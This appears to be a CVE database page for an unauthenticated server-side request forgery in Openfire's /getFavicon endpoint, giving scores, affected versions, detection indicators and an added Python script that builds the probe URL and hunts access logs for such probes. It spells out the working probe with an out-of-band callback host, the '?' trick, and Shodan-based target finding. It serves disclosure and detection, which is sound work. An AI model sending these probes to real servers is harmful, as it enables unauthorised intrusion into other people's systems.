cbcvebase.
CVE-2019-18394
published 2019-10-24

Priority: P181 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Flags: ITW · Exploit · VulnCheck KEV
Exploited in the wild
EPSS: 32.30% (98.1st percentile)
A Server Side Request Forgery (SSRF) vulnerability in FaviconServlet.java in Ignite Realtime Openfire through 4.4.2 allows attackers to send arbitrary HTTP GET requests.

Affected (2 ranges)

Vendor           Product              Version range   Fixed in
igniterealtime   openfire             <= 4.4.2        (not listed)
pascom           cloud_phone_system   <= 7.19         (not listed)

Detection & IOCs (extracted from sources)

url     /getFavicon?host=oast.fun?
domain  oast.fun
path    /getFavicon
  • The vulnerable endpoint is /getFavicon with a `host` parameter. Send a GET request with an out-of-band callback domain as the `host` value and watch for an HTTP interaction on the OAST server; the interaction itself is the proof of SSRF, whatever the servlet returns to the caller.
  • The Nuclei template additionally matches on the response: HTTP 200 with Content-Type image/x-icon and a body containing 'Interactsh Server', which shows that the servlet passes the fetched body straight back to the requester. That body match only holds when the public Interactsh server is the callback host; a private OOB server returns a different banner.
  • Identify exposed Openfire Admin Console instances via Shodan queries on http.title to prioritise scanning targets.
  • The vulnerability is unauthenticated (PR:N, UI:N) and affects Openfire through 4.4.2; any internet-facing Openfire instance on an affected version should be treated as exploitable without credentials.
  • The same SSRF primitive exists in the XMPP Server component (xmppserver jar) of the Jive platform as used in Pascom Cloud Phone System before 7.20.x. Monitor backend Tomcat traffic for unexpected outbound requests originating from the /getFavicon handler, and review access logs for /getFavicon requests whose `host` parameter points outside your own domains.
  • The OAST domain 'oast.fun' used in the Nuclei template is the Interactsh public server; replace it with a privately controlled out-of-band server in production testing to avoid leaking target information.
  • The trailing '?' appended after the OAST domain in the `host` parameter is intentional: it turns any path the servlet appends after the host into a query string, so the callback still goes to the root of the OOB host.
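The probe-and-confirm procedure above, together with the log review suggested for the Pascom/Openfire backend, as an added example. This is not code from the CVE page, the Nuclei template or the Openfire project: the function names, the base URL, the domain allowlist and the access-log lines are all assumptions constructed for the example, and the log lines use documentation IP ranges.

```python
"""Added example (not from the CVE page or Openfire): build the /getFavicon SSRF
probe, apply the response matchers the page attributes to the Nuclei template,
and hunt NCSA-style access logs for probes aimed outside an allowlist.
All names, URLs, allowlists and log lines here are assumptions/constructed."""
import re
from urllib.parse import parse_qs, urlparse

FAVICON_PATH = "/getFavicon"

# NCSA/common log format as written by Tomcat's AccessLogValve or Jetty (assumed).
_LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample log: two external probes, one legitimate internal request,
# one unrelated request. 203.0.113.0/24 and 192.0.2.0/24 are documentation ranges.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [24/Oct/2019:10:15:32 +0000] "GET /getFavicon?host=oast.fun? HTTP/1.1" 200 318',
    '203.0.113.5 - - [24/Oct/2019:10:15:40 +0000] "GET /getFavicon?host=192.0.2.10%3F HTTP/1.1" 200 21',
    '10.0.0.7 - - [24/Oct/2019:10:16:01 +0000] "GET /getFavicon?host=conference.xmpp.example.internal HTTP/1.1" 200 1150',
    '10.0.0.9 - - [24/Oct/2019:10:16:05 +0000] "GET /login.jsp HTTP/1.1" 200 4021',
]


def build_probe_url(base_url: str, oob_host: str) -> str:
    """Return the GET URL that makes the servlet fetch from the OOB host.

    The trailing '?' is deliberate: whatever path the servlet appends after the
    host becomes a query string, so the callback lands on the root of oob_host.
    """
    return f"{base_url.rstrip('/')}{FAVICON_PATH}?host={oob_host}?"


def matches_oob_response(status: int, headers: dict, body: bytes) -> bool:
    """Apply the matchers the page attributes to the Nuclei template: 200,
    image/x-icon, and the public Interactsh banner relayed back in the body.
    Only the public oast.fun server produces that banner; with a private OOB
    server rely on the interaction log instead of this check."""
    lowered = {k.lower(): v for k, v in headers.items()}
    content_type = lowered.get("content-type", "")
    return (
        status == 200
        and content_type.lower().startswith("image/x-icon")
        and b"Interactsh Server" in body
    )


def favicon_host_param(request_target: str):
    """Return the `host` parameter of a /getFavicon request target, or None."""
    parsed = urlparse(request_target)
    if parsed.path != FAVICON_PATH:
        return None
    values = parse_qs(parsed.query).get("host")  # parse_qs also percent-decodes
    if not values:
        return None
    # Drop the '?' trick so the allowlist check sees the bare host value.
    return values[0].rstrip("?").lower()


def find_ssrf_probes(log_lines, allowed_suffixes):
    """Return (source_ip, host_param) for /getFavicon requests whose host
    parameter is outside the domains this server is expected to fetch from."""
    hits = []
    for line in log_lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        host = favicon_host_param(m.group("target"))
        if host is None:
            continue
        if not any(host == s or host.endswith("." + s) for s in allowed_suffixes):
            hits.append((m.group("src"), host))
    return hits


if __name__ == "__main__":
    # Assumed target: an Openfire Admin Console on its default port 9090.
    print(build_probe_url("http://openfire.example:9090", "oast.fun"))
    for src, host in find_ssrf_probes(SAMPLE_ACCESS_LOG, ("example.internal",)):
        print(f"possible SSRF probe from {src} -> {host}")
```

The allowlist check is suffix-based on the decoded `host` value, so a probe that percent-encodes the trailing `?` (as in the second sample line) is caught the same way as the raw form in the Nuclei IOC; the list of allowed suffixes must be your own XMPP/conference domains, not anything derived from the request.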

CVSS provenance

nvd        v3.1   9.8   CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd        v2.0   7.5   HIGH       AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck         9.8   CRITICAL